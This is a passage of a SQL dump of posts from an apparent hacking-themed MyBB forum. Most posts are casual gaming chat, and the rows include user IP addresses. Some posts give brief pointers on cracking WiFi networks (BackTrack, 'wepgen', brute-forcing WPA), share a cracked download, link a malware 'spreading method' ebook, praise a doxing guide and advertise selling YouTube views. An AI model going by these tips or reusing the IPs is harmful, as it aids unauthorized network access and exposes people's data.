'1350120241', 'lol they don\'t cost over 100 dollars, it like 60, I don\'t really encourage pirated games on the consoles, but i do love em on the pc.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', 'eb8baa95a5d3e1ca82a5d245a33810fa', '0', '0'); INSERT INTO mybb_posts VALUES('4438', '827', '4326', '76', 'RE: Playstation names', '0', '254', 'Greed', '1350120367', 'lol lazy are ya, mate! lol I can do that no sweat and im lazy too, even I work and still manage to do it!', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '144dfc00b4c046bb28808eed77a3ca12', '0', '0'); INSERT INTO mybb_posts VALUES('4439', '845', '4419', '72', 'RE: whats better ps3 or xbox', '0', '257', 'XxTREYZxX', '1350120380', 'yeah true but money does not bother me much', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '650c83a4c67c93c290ec158f84ce926f', '0', '0'); INSERT INTO mybb_posts VALUES('4440', '827', '4326', '76', 'RE: Playstation names', '0', '257', 'XxTREYZxX', '1350120474', 'nah im just lazy now .lol', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '038fbad27b0374bfed37cb19c3b01738', '0', '0'); INSERT INTO mybb_posts VALUES('4441', '827', '4326', '76', 'RE: Playstation names', '0', '254', 'Greed', '1350120544', 'lol good for yeah! fun being lazy isn\'t it! but really add me soon.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '32caaf9d4ce17420308bbc87a75c7541', '0', '0'); INSERT INTO mybb_posts VALUES('4442', '846', '4420', '74', 'RE: another great pvp', '0', '254', 'Greed', '1350120629', 'Err I don\'t see anything here? is suppose to be like that?', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '635606a0a6830226e65aee7800e97f6b', '0', '0'); INSERT INTO mybb_posts VALUES('4443', '845', '4437', '72', 'RE: whats better ps3 or xbox', '0', '258', 'PiXEL^OG', '1350120635', '[quote=\'Greed\' pid=\'4437\' dateline=\'1350120241\']\r\nlol they don\'t cost over 100 dollars, it like 60, I don\'t really encourage pirated games on the consoles, but i do love em on the pc.\r\n[/quote]\r\n\r\nYour name is Greed yet you like to PAY for games? Seems legit :)', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '69b235972b7adcadf49ae1ad4d9ab8fe', '0', '0'); INSERT INTO mybb_posts VALUES('4444', '190', '665', '56', 'RE: Copy and paste game', '0', '257', 'XxTREYZxX', '1350120679', 'my hotmail acount that i copied', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '3a65f780ae8150603a3670d27c0b23a6', '0', '0'); INSERT INTO mybb_posts VALUES('4445', '845', '4419', '72', 'RE: whats better ps3 or xbox', '0', '254', 'Greed', '1350121093', 'you see here, I like games, I like every single game, but how is that possible well I\'ll tell ya how, by buying games and supporting the makers, and it easy to do! I can get money by doing work, Hell I want money and games and everything.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '8fa67bc6d33d9381cfda8b573b0febac', '0', '0'); INSERT INTO mybb_posts VALUES('4446', '845', '4419', '72', 'RE: whats better ps3 or xbox', '0', '257', 'XxTREYZxX', '1350121173', 'yeah it doesnt mean he is greed (or is he) lol', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '5e68518485f2767101a415d702100702', '0', '0'); INSERT INTO mybb_posts VALUES('4447', '821', '4294', '28', 'RE: What\'s on your mind or what are your future plans?', '0', '254', 'Greed', '1350121230', 'Getting money, getting more money, and even getting more money then how much money I can get! My future plan involves everything I can get, even the ladies!', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', 'e0659f5c3e8f2291214291e21cbfe983', '0', '0'); INSERT INTO mybb_posts VALUES('4448', '846', '4420', '74', 'RE: another great pvp', '0', '257', 'XxTREYZxX', '1350121339', 'there edited sorry i completely forgot', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '1f1d1a5d1bc2296d111d3a1a58e07fcf', '0', '0'); INSERT INTO mybb_posts VALUES('4449', '827', '4326', '76', 'RE: Playstation names', '0', '257', 'XxTREYZxX', '1350121424', 'yeah i will try tommorow because we are going somewhere i dont even know where.', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '1f152940af9d15823de1ea8560acda07', '0', '0'); INSERT INTO mybb_posts VALUES('4450', '845', '4419', '72', 'RE: whats better ps3 or xbox', '0', '254', 'Greed', '1350121452', 'Greed, yes I am Greed I take what you want in live and make it bigger, better, and most importantly MINE! So you ask yourself are you better then Greed? Well no, because I always one step ahead.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '71ee4e9f0bcccd600efa25fe91c23f61', '0', '0'); INSERT INTO mybb_posts VALUES('4451', '840', '4390', '4', 'RE: Its andrew', '0', '257', 'XxTREYZxX', '1350121986', 'welcome my fellow freind to the one and only L33THACKING.NET', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '7b12eaac1a842a46e00b664f5aa612a5', '0', '0'); INSERT INTO mybb_posts VALUES('4506', '3', '4504', '19', 'RE: Official Site Rules', '0', '62', 'R?????zo?', '1350153751', '[quote=\'NXK\' pid=\'4504\' dateline=\'1350152885\']\r\nSo you copy and pasted Hack forums rules, Literally word for word.\r\n\r\nWow that doesn\'t make us look like a bunch of leechers.\r\n[/quote]\r\n\r\nI was thinking exactly the same thing, makes us look unprofessional.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'eed92d2a96830c21068617cb2c20fb7b', '0', '0'); INSERT INTO mybb_posts VALUES('4453', '833', '4375', '3', 'RE: New feature coming up!', '0', '257', 'XxTREYZxX', '1350122714', 'this would be a great addition to the site', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '229f399987e2045b6dd93b7f19e7984f', '0', '0'); INSERT INTO mybb_posts VALUES('4454', '845', '4450', '72', 'RE: whats better ps3 or xbox', '0', '258', 'PiXEL^OG', '1350123830', '[quote=\'Greed\' pid=\'4450\' dateline=\'1350121452\']\nGreed, yes I am Greed I take what you want in live and make it bigger, better, and most importantly MINE! So you ask yourself are you better then Greed? Well no, because I always one step ahead.\n[/quote]\n\nLMAO yeah right im sure u are :roflol:\n\nI get like 500 dollars on my File ice like every 1 month , also im like 14 so i can\'t be bothered wasting my money on Gamestop\n\nThough i do agree , supporting developers is important so they can make more epic games in the future but ill let you pay them for me :)\n\nAlso its spelled \"Im always one step ahead\" Not \"i always one step ahead\" I can see you need ALOT of work on your English so im 500 steps ahead of you in English :D', '139.190.235.246', '-1950422026', '0', '0', '258', '1350124108', '1', '48538a1065ca4715e08f534f12338270', '0', '1350124108'); INSERT INTO mybb_posts VALUES('4455', '833', '4375', '3', 'RE: New feature coming up!', '0', '53', 'sirchamp', '1350124076', 'That would be something that would make this site really unique', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '62af7a0841c447db2e4f554342389b59', '0', '0'); INSERT INTO mybb_posts VALUES('4456', '842', '4432', '71', 'RE: Assasins creed 3', '0', '258', 'PiXEL^OG', '1350124214', '[quote=\'treyz123456789\' pid=\'4432\' dateline=\'1350119532\']\r\nhmmm dear lol and yer i will do the first mission first duh\r\n[/quote]\r\n\r\nWell then this thread is pointless', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'eebf853fbf4d7d978d6766f9fc358148', '0', '0'); INSERT INTO mybb_posts VALUES('4457', '845', '4419', '72', 'RE: whats better ps3 or xbox', '0', '257', 'XxTREYZxX', '1350124394', 'thats not a nice reply hes only joking .\n[hr]\nand 500 can you teach me how to do that', '203.104.11.2', '-882373886', '1', '0', '257', '1350124441', '1', '6559518f304ff87986605e601cecbf67', '0', '0'); INSERT INTO mybb_posts VALUES('4458', '845', '4454', '72', 'RE: whats better ps3 or xbox', '0', '254', 'Greed', '1350124461', '[quote=\'XTr3ME PiX3L\' pid=\'4454\' dateline=\'1350123830\']\r\n[quote=\'Greed\' pid=\'4450\' dateline=\'1350121452\']\r\nGreed, yes I am Greed I take what you want in live and make it bigger, better, and most importantly MINE! So you ask yourself are you better then Greed? Well no, because I always one step ahead.\r\n[/quote]\r\n\r\nLMAO yeah right im sure u are :roflol:\r\n\r\nI get like 500 dollars on my File ice like every 1 month , also im like 14 so i can\'t be bothered wasting my money on Gamestop\r\n\r\nThough i do agree , supporting developers is important so they can make more epic games in the future but ill let you pay them for me :)\r\n\r\nAlso its spelled \"Im always one step ahead\" Not \"i always one step ahead\" I can see you need ALOT of work on your English so im 500 steps ahead of you in English :D\r\n[/quote]\r\n\r\nlol who cares about if you make 500 dollars on some site, and who care how old you are, and then who cares about my english and what not, I don\'t have time to correct my grammer. If you have time then go ahead lol waste your time. now let\'s stay on topic okay? \r\n\r\nSo yeah I do believe that the graphics are better on the ps3 and that the xbox is lame because you have oversized controllers and have to pay for the online.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '2b54252ac8d3c8a0da16a60e199e4107', '0', '0'); INSERT INTO mybb_posts VALUES('4459', '845', '4457', '72', 'RE: whats better ps3 or xbox', '0', '258', 'PiXEL^OG', '1350124590', '[quote=\'treyz123456789\' pid=\'4457\' dateline=\'1350124394\']\r\nthats not a nice reply hes only joking .\r\n[hr]\r\nand 500 can you teach me how to do that\r\n[/quote]\r\n\r\nReally? O im sorry\r\n\r\nI thought he was being serious. Again Sorry everyone\n[hr]\n[quote=\'Greed\' pid=\'4458\' dateline=\'1350124461\']\r\n[quote=\'XTr3ME PiX3L\' pid=\'4454\' dateline=\'1350123830\']\r\n[quote=\'Greed\' pid=\'4450\' dateline=\'1350121452\']\r\nGreed, yes I am Greed I take what you want in live and make it bigger, better, and most importantly MINE! So you ask yourself are you better then Greed? Well no, because I always one step ahead.\r\n[/quote]\r\n\r\nLMAO yeah right im sure u are :roflol:\r\n\r\nI get like 500 dollars on my File ice like every 1 month , also im like 14 so i can\'t be bothered wasting my money on Gamestop\r\n\r\nThough i do agree , supporting developers is important so they can make more epic games in the future but ill let you pay them for me :)\r\n\r\nAlso its spelled \"Im always one step ahead\" Not \"i always one step ahead\" I can see you need ALOT of work on your English so im 500 steps ahead of you in English :D\r\n[/quote]\r\n\r\nlol who cares about if you make 500 dollars on some site, and who care how old you are, and then who cares about my english and what not, I don\'t have time to correct my grammer. If you have time then go ahead lol waste your time. now let\'s stay on topic okay? \r\n\r\nSo yeah I do believe that the graphics are better on the ps3 and that the xbox is lame because you have oversized controllers and have to pay for the online.\r\n[/quote]\r\n\r\nActually Xbox 360 has a faster frame rate than PS3\r\n\r\nAs for graphics i agree', '139.190.235.246', '-1950422026', '0', '0', '258', '1350124813', '1', 'eed1762c68bcfbdddc8c1722f8124d5a', '0', '0'); INSERT INTO mybb_posts VALUES('4460', '845', '4419', '72', 'RE: whats better ps3 or xbox', '0', '254', 'Greed', '1350124907', 'yeah, lol If I were the real Greed would you think I would be here. I would be trying to take the world, getting all the money, getting everything I could. Now stay on topic lol', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '457057c22b32a8053e83b0ec55d3ca25', '0', '0'); INSERT INTO mybb_posts VALUES('4461', '845', '4419', '72', 'RE: whats better ps3 or xbox', '0', '257', 'XxTREYZxX', '1350124996', 'yeah 100 dollars for 12 months \r\nand for ps3 i have like 4 account one for pissing people off, one for prestiging and one for hacking its so much more fun', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', 'eeef789e22843a4be8bbbc1c0c796d53', '0', '0'); INSERT INTO mybb_posts VALUES('4462', '842', '4400', '71', 'RE: Assasins creed 3', '0', '254', 'Greed', '1350125058', 'Well not really, I wanted to know who pre ordered it and what Would you do first when your in the game, when your not doing the first mission.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '3ec22658411770d5d16696cf81efea65', '0', '0'); INSERT INTO mybb_posts VALUES('4463', '845', '4419', '72', 'RE: whats better ps3 or xbox', '0', '254', 'Greed', '1350125223', 'yeah if you hack on the ps3, I\'m going to troll you until you DIE! lol no hacking like I said it not fun for other people and well for pissing people off, now thats fun lol', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '003a023277bc22c63b25785d7a6ff3c4', '0', '0'); INSERT INTO mybb_posts VALUES('4464', '845', '4461', '72', 'RE: whats better ps3 or xbox', '0', '258', 'PiXEL^OG', '1350125297', '[quote=\'treyz123456789\' pid=\'4461\' dateline=\'1350124996\']\nyeah 100 dollars for 12 months \nand for ps3 i have like 4 account one for pissing people off, one for prestiging and one for hacking its so much more fun\n[/quote]\n\nThe hole Xbox live thing is Annoying to pay for but if you have Xbox 360 elite then you can make fake accounts and each account has 1 month free XBL gold so if you run out then just make a new one.\n\nAlso you can play Pirated games online on Xbox , you can\'t do the same on PS3 but for people who don\'t have alot of money they can buy an Xbox', '139.190.235.246', '-1950422026', '0', '0', '258', '1350125328', '1', '3c5b827a197ba2744b63fdb00c3e0b1e', '0', '1350125328'); INSERT INTO mybb_posts VALUES('4465', '842', '4400', '71', 'RE: Assasins creed 3', '0', '257', 'XxTREYZxX', '1350125367', 'true i pre odered it last week or so', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', 'c914425dabba42c44fd51a648248ed35', '0', '0'); INSERT INTO mybb_posts VALUES('4466', '845', '4419', '72', 'RE: whats better ps3 or xbox', '0', '257', 'XxTREYZxX', '1350125559', 'yeah thats actually a smrt idea\n[hr]\nyeah but i only hack for single player like special ops and campaign.', '203.104.11.2', '-882373886', '1', '0', '257', '1350125643', '1', '2102b2ea104e716991cc57ad87705629', '0', '0'); INSERT INTO mybb_posts VALUES('4467', '840', '4390', '4', 'RE: Its andrew', '0', '258', 'PiXEL^OG', '1350126530', 'Welcome to L33t hacking , Enjoy your stay and hope you learn something :)', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '6c61f8e3793d6905678ca22e5092327e', '0', '0'); INSERT INTO mybb_posts VALUES('4468', '849', '0', '73', 'when did you buy your ipod', '0', '257', 'XxTREYZxX', '1350126710', 'when did you buy your ipod', '203.104.11.2', '-882373886', '1', '0', '1', '1350153718', '1', '275531c2e44d650be6b15acb3138478e', '0', '1350153718'); INSERT INTO mybb_posts VALUES('4573', '619', '3008', '34', 'RE: [Photoshop CS5] How to make a logo', '0', '257', 'XxTREYZxX', '1350186464', 'i did now haha gotcha\ni reped i wasnt a elite member lol', '203.104.11.5', '-882373883', '1', '0', '0', '0', '1', 'dc0748e35e124d09e2926ec1bfdd394a', '0', '0'); INSERT INTO mybb_posts VALUES('4469', '849', '4468', '73', 'RE: when did you buy you ipod', '0', '258', 'PiXEL^OG', '1350127371', 'I bought my Ipod touch 4g when it came out in November or was it October 2010', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '4187adda90fcd95a5b3b98522d2e71d6', '0', '0'); INSERT INTO mybb_posts VALUES('4470', '849', '4468', '73', 'RE: when did you buy you ipod', '0', '257', 'XxTREYZxX', '1350127797', 'i bought my ipod 4g for christmas', '203.104.11.8', '-882373880', '1', '0', '0', '0', '1', 'b466b5e70e8578745edad2f7690bcf3f', '0', '0'); INSERT INTO mybb_posts VALUES('4471', '171', '528', '8', 'RE: What Genre do you listen to?', '0', '257', 'XxTREYZxX', '1350128328', 'i listen to dubstep,hip,hop and rap', '203.104.11.6', '-882373882', '1', '0', '0', '0', '1', '5bf988d080920062e1edd5903733c10e', '0', '0'); INSERT INTO mybb_posts VALUES('4472', '848', '4435', '12', 'RE: can someone teach me how to hack a wifi connection', '0', '205', 'mothered', '1350129556', 'Your best option Is to Install BackTrack. It has all the tools pre-Installed.\r\n\r\nGetting Into a WEP network Is very easy. It takes me on average around 10 minutes. Since most encrypted Networks have WPA/WPA2/WPAPSK, you can have a look at this guide: http://www.securitytube.net/video/3971\r\n\r\nFirst and foremost, you do need a compatible wireless card/chipset.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '50e449ed1ca883479a779ab8c7dfa4c8', '0', '0'); INSERT INTO mybb_posts VALUES('4473', '836', '4385', '30', 'RE: Internet Download Manager [IDM] v6.12.22 + crack + skin', '0', '205', 'mothered', '1350129715', 'I have this via another source, and It\'s a pretty good little tool, that does serve It\'s purpose.\r\n\r\nNice one mate.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '49453f739c71bfaaa3783eef73d6db26', '0', '0'); INSERT INTO mybb_posts VALUES('4474', '517', '2564', '34', 'RE: Spiderman Signature Tutorial', '0', '257', 'XxTREYZxX', '1350130058', 'thats a great tutorial keep up the good work as you always do', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '4afae59026514d05e72e6e30f1a154ed', '0', '0'); INSERT INTO mybb_posts VALUES('4475', '153', '401', '34', 'RE: [TUT] How to Render SMOKE and FIRE in Seconds', '0', '257', 'XxTREYZxX', '1350130517', 'thats great. it looks sexy as, lol', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '701025aab1bb558561c9def0e3d54f6c', '0', '0'); INSERT INTO mybb_posts VALUES('4476', '101', '241', '34', 'RE: [tut]Glossy Logo', '0', '257', 'XxTREYZxX', '1350130813', 'nice tutorial and keep it up', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '79becf053202e7beb56c62fcbce72254', '0', '0'); INSERT INTO mybb_posts VALUES('4477', '848', '4435', '12', 'RE: can someone teach me how to hack a wifi connection', '0', '257', 'XxTREYZxX', '1350131591', 'thank you for all the help considering you are the first one to comment.', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', 'bcc7d739bcd8e433dd22da1079657d4e', '0', '0'); INSERT INTO mybb_posts VALUES('4478', '850', '0', '63', 'anyone interested in making me a logo', '0', '257', 'XxTREYZxX', '1350132531', 'anyone interested in making me a logo for free i would really like to have one made for me, thankyou', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '63f05fbbfcf2906f0bde5ed148b0c5a3', '0', '0'); INSERT INTO mybb_posts VALUES('4479', '80', '190', '24', 'RE: How WiFi Security Works', '0', '257', 'XxTREYZxX', '1350132790', 'just another great HQ post by the amazing staff, keep up the good work', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '0c1b7b43f9e46e5840e2a3248532b35e', '0', '0'); INSERT INTO mybb_posts VALUES('4480', '788', '4099', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '257', 'XxTREYZxX', '1350133110', 'yeah LT this is our home\ni love this community in the most homo-ess way ever', '203.104.11.43', '-882373845', '1', '0', '257', '1350200599', '1', 'c4aed326addcc8f9d0939ac25b24d3c7', '0', '1350200599'); INSERT INTO mybb_posts VALUES('4481', '848', '4435', '12', 'RE: can someone teach me how to hack a wifi connection', '0', '53', 'sirchamp', '1350135816', 'If its wep network, its very easy( copy the mac adress, paste it into the tool \"wepgen\" and you get the key ).\n If its a WPA or WPA2 network you will have to bruteforce into it.', '180.72.215.3', '-1270294781', '1', '0', '0', '0', '1', '203e56799522c1d6c44e60d0fca41363', '0', '0'); INSERT INTO mybb_posts VALUES('4482', '50', '132', '12', 'RE: [tut]How to DOX', '0', '53', 'sirchamp', '1350137149', 'Didnt know this. Very nice guide.', '206.202.36.17', '-825613295', '1', '0', '0', '0', '1', '5189598e99960e248b5dc3d8f515597f', '0', '0'); INSERT INTO mybb_posts VALUES('4483', '851', '0', '9', 'Selling youtube views', '0', '53', 'sirchamp', '1350142176', 'I bought a pack of 25000 youtube views. I used 3000 but I dont need the rest thats why Im selling them for a discount price.\nThread will be closed as soon as all the views are used up.\n20K views are the maximum.\n\nOffers:\n\n20000 views - 15$\n\n10000 views - likes - 15$\n\n10000 views - favourites - 15$\n\n10000 views - subscribers - 15$\n\n5000 views - subscribers - favourites - likes - 15$\n\nOther offers available! \n\nPayment:\nPaypal. Pm me to buy\n\n\nThis isnt really the right section but since we dont have a market section I just posted it here.', '138.90.97.195', '-1973788221', '1', '0', '53', '1350142259', '1', '86261e7ae5211785e0691d92f8771800', '0', '1350142259'); INSERT INTO mybb_posts VALUES('4484', '844', '4418', '73', 'RE: TEMPLE RUN CHEAT (UNLIMITED RUN)', '0', '100', '??zg???g????61', '1350144146', 'Alright, first of all this isn\'t even a cheat, second of all Indie patched this months ago -___-', '70.192.10.204', '1186990796', '1', '0', '0', '0', '1', '3dcc5fe1bd9b68e86d141f257aad346e', '0', '0'); INSERT INTO mybb_posts VALUES('4485', '190', '665', '56', 'RE: Copy and paste game', '0', '199', 'Anonymous™', '1350145790', 'http://l33thacking.net/thread-190-post-4444.html#pid4444', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', 'af64778cca7d29f860ef2e46a60d335c', '0', '0'); INSERT INTO mybb_posts VALUES('4486', '190', '665', '56', 'RE: Copy and paste game', '0', '61', 'NXK', '1350145886', 'Greed\n\nNewest member added to the gamers group.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '93212f5eb1386df97c0377f3719a9071', '0', '0'); INSERT INTO mybb_posts VALUES('4487', '852', '0', '71', 'Whats the best game you played?', '0', '254', 'Greed', '1350148668', 'As the title says, what the best game you ever played? \r\nMine has to be The Legend of Zelda: Ocarina of Time', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '50a6925a166d2f0c68da9b4cc9454669', '0', '0'); INSERT INTO mybb_posts VALUES('4488', '802', '4401', '77', 'RE: MW3 Knockback Lobby | FREE', '0', '3', '??????????¢™', '1350149910', '[quote=\'treyz123456789\' pid=\'4401\' dateline=\'1350113047\']\r\ndamm i am currently on ps3, i sold my xbox last month\r\n[/quote]\r\n\r\nAww that sucks, I like xbox better.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'c49fd9eaf24d265ae18c8ccec4fb3899', '0', '0'); INSERT INTO mybb_posts VALUES('4500', '851', '4483', '9', 'RE: Selling youtube views', '0', '61', 'NXK', '1350152157', 'You are allowed to sell things, We just don\'t have a market place section ATM. Just to clear that up.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '00dbbc2d3c765553b3a34d4a47cd150c', '0', '0'); INSERT INTO mybb_posts VALUES('4490', '850', '4478', '63', 'RE: anyone interested in making me a logo', '0', '62', 'R?????zo?', '1350151395', 'depends if you give me a size and colour scheme, also the name of your company or whatever and whats related to.\nI might do it if I have the time', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'b64431849da1e5435719e8f92055d9d2', '0', '0'); INSERT INTO mybb_posts VALUES('4491', '849', '4468', '73', 'RE: when did you buy you ipod', '0', '62', 'R?????zo?', '1350151432', 'i don\'t own an ipod, got an iphone though.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'c10a6aa15092cd702cceeb6a8ff6c4ab', '0', '0'); INSERT INTO mybb_posts VALUES('4492', '840', '4390', '4', 'RE: Its andrew', '0', '62', 'R?????zo?', '1350151465', 'Welcome bro, enjoy your stay.\nBe HQ and stay active :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '0b1701f197c14addce1efc305e8cdb60', '0', '0'); INSERT INTO mybb_posts VALUES('4493', '833', '4375', '3', 'RE: New feature coming up!', '0', '62', 'R?????zo?', '1350151518', 'Wow that sounds nice, hopefully doesnt make the hosting server lag though.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'd9043ca2ac7ca5940ea7f223c2bee08b', '0', '0'); INSERT INTO mybb_posts VALUES('4494', '846', '4420', '74', 'RE: another great pvp', '0', '62', 'R?????zo?', '1350151557', 'is that for minecraft or what?', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '1d3f81b1eacee1cf26ece57657bad110', '0', '0'); INSERT INTO mybb_posts VALUES('4495', '3', '7', '19', 'RE: Official Site Rules', '0', '3', '??????????¢™', '1350151626', 'I have lowered the size just a little bit, That is because I actually want people to read them and see them.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '2785a0e0915185df625605633e434f5a', '0', '0'); INSERT INTO mybb_posts VALUES('4496', '790', '4350', '58', 'RE: Unique - Recruitment', '0', '62', 'R?????zo?', '1350151681', '[quote=\'iTzIpod\' pid=\'4350\' dateline=\'1350092788\']\r\nI\'ll apply. Do I still gotta fill out the form? Even though I was the Original Leader of Unique?\r\n[/quote]\r\n\r\nyou don\'t need to apply, I will be happy to add you back.\r\nand offer you a spot as co-leader if you are interested :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '190049c2a35e1d0404bafc243db7d02a', '0', '0'); INSERT INTO mybb_posts VALUES('4497', '835', '4381', '24', 'RE: Just purchased another Lappy', '0', '62', 'R?????zo?', '1350151743', 'Looks nice bro, way better then my current one :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'e20043af64e93484d596f4a007532d2f', '0', '0'); INSERT INTO mybb_posts VALUES('4498', '851', '4483', '9', 'RE: Selling youtube views', '0', '53', 'sirchamp', '1350152010', 'Where does it say that? I have deep respect for you beeing a moderator but as much as I know we dont have a marketplace because it would be as empty as the sahara desert^^', '170.119.188.88', '-1434993576', '1', '0', '0', '0', '1', '44df26057067e31d8b0659ce28e147a3', '0', '0'); INSERT INTO mybb_posts VALUES('4499', '815', '4318', '73', 'RE: your favourite iOS games', '0', '62', 'R?????zo?', '1350152015', '[quote=\'GlowingCapes\' pid=\'4318\' dateline=\'1350037108\']\r\nYeah, I figured that when you saw it. Do you have any games that you like to play long-term? I need one like that, haven\'t had one in a while.\r\n[/quote]\r\n\r\nWell, I currently have:\r\n\r\nAngry Birds\r\nPlague Inc\r\nDraw Something\r\n100 Floors\r\n100 Exits\r\nCatch Candy\r\nWorms Crazy Golf\r\nFruit Ninja\r\nTaco Master\r\nthe Sheeps\r\nNY Nights\r\nMonopoly (lol)\r\nSimCity Deluxe\r\nSmash Cops', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '8275171c067b98532218ec991095f25d', '0', '0'); INSERT INTO mybb_posts VALUES('4502', '853', '0', '59', 'My Way Of Spreading Method And Get Tons Of Installs', '0', '62', 'R?????zo?', '1350152433', 'Heres an ebook that might come handy for you.\r\n\r\nDownload link: http://www.mediafire.com/view/?3prkfgqnp2ttdca', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '61b61b14fe88f66502d575db60405c1b', '0', '0'); INSERT INTO mybb_posts VALUES('4503', '851', '4483', '9', 'RE: Selling youtube views', '0', '53', 'sirchamp', '1350152442', 'LOL. Ipwnaholic deleted his comment.', '186.173.105.177', '-1163040335', '1', '0', '0', '0', '1', 'c820e8b0a097eeeb1843d3c215c21646', '0', '0'); INSERT INTO mybb_posts VALUES('4504', '3', '7', '19', 'RE: Official Site Rules', '0', '61', 'NXK', '1350152885', 'So you copy and pasted Hack forums rules, Literally word for word.\n\nWow that doesn\'t make us look like a bunch of leechers.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '744da279ebb7f2661df1638af89fa841', '0', '0'); INSERT INTO mybb_posts VALUES('4505', '851', '4503', '9', 'RE: Selling youtube views', '0', '61', 'NXK', '1350153134', '[quote=\'sirchamp\' pid=\'4503\' dateline=\'1350152442\']\r\nLOL. Ipwnaholic deleted his comment.\r\n[/quote]\r\n\r\nI deleted it, So new members who may have read that comment get the wrong idea that they aren\'t allowed to sell anything.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'a343d3b95cff4751690e4a8db1e75fe7', '0', '0'); INSERT INTO mybb_posts VALUES('4507', '849', '4468', '73', 'RE: when did you buy your ipod', '0', '1', 't3h jok3r', '1350153762', 'I bought it somewhere around May 2011', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '15760334b69b7ed23b0b1fc85f4d98a5', '0', '0'); INSERT INTO mybb_posts VALUES('4508', '852', '4487', '71', 'RE: Whats the best game you played?', '0', '1', 't3h jok3r', '1350153816', 'I played a lot of good games actually I only play the best games which are vouched by gamespot employees.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '541d8abfb7fa9e8de24987b829163eea', '0', '0'); INSERT INTO mybb_posts VALUES('4509', '840', '4390', '4', 'RE: Its andrew', '0', '1', 't3h jok3r', '1350154001', 'Welcome to L33THacking and hope you enjoy your stay.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '207a21d4972ebe52a3597c9678aef259', '0', '0'); INSERT INTO mybb_posts VALUES('4510', '854', '0', '7', 'Boasting thread', '0', '53', 'sirchamp', '1350155819', 'Boast about something. ;)\r\n\r\nIll start off. I made 35 Dollars on adfoc.us in one day \r\nProof:\r\n[img]http://i47.tinypic.com/ifogvc.jpg[/img]', '33.48.215.4', '556848900', '1', '0', '0', '0', '1', 'a6a0341eaa36203477e91d44b9c119c8', '0', '0'); INSERT INTO mybb_posts VALUES('4511', '3', '4504', '19', 'RE: Official Site Rules', '0', '3', '??????????¢™', '1350156197', '[quote=\'NXK\' pid=\'4504\' dateline=\'1350152885\']\r\nSo you copy and pasted Hack forums rules, Literally word for word.\r\n\r\nWow that doesn\'t make us look like a bunch of leechers.\r\n[/quote]\r\n\r\nThese rules are old when I was one of the first admins here, when this site first started.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '3f41f7ce2fc9c875549694fbc4e515ea', '0', '0'); INSERT INTO mybb_posts VALUES('4512', '851', '4503', '9', 'RE: Selling youtube views', '0', '3', '??????????¢™', '1350156282', '[quote=\'sirchamp\' pid=\'4503\' dateline=\'1350152442\']\r\nLOL. Ipwnaholic deleted his comment.\r\n[/quote]\r\n\r\nLOL no i didnt, also this is the wrong section for this anyways so it shouldnt even belong here.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'a6cd4ca9f74a1c18d607ec142110923b', '0', '0'); INSERT INTO mybb_posts VALUES('4513', '854', '4510', '7', 'RE: Boasting thread', '0', '61', 'NXK', '1350156678', 'That\'s pretty crazy man.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '9f36622b2ee91f713c63b7e4a67f74f6', '0', '0'); INSERT INTO mybb_posts VALUES('4514', '851', '4512', '9', 'RE: Selling youtube views', '0', '61', 'NXK', '1350156940', '[quote=\'??????????¢™\' pid=\'4512\' dateline=\'1350156282\']\n[quote=\'sirchamp\' pid=\'4503\' 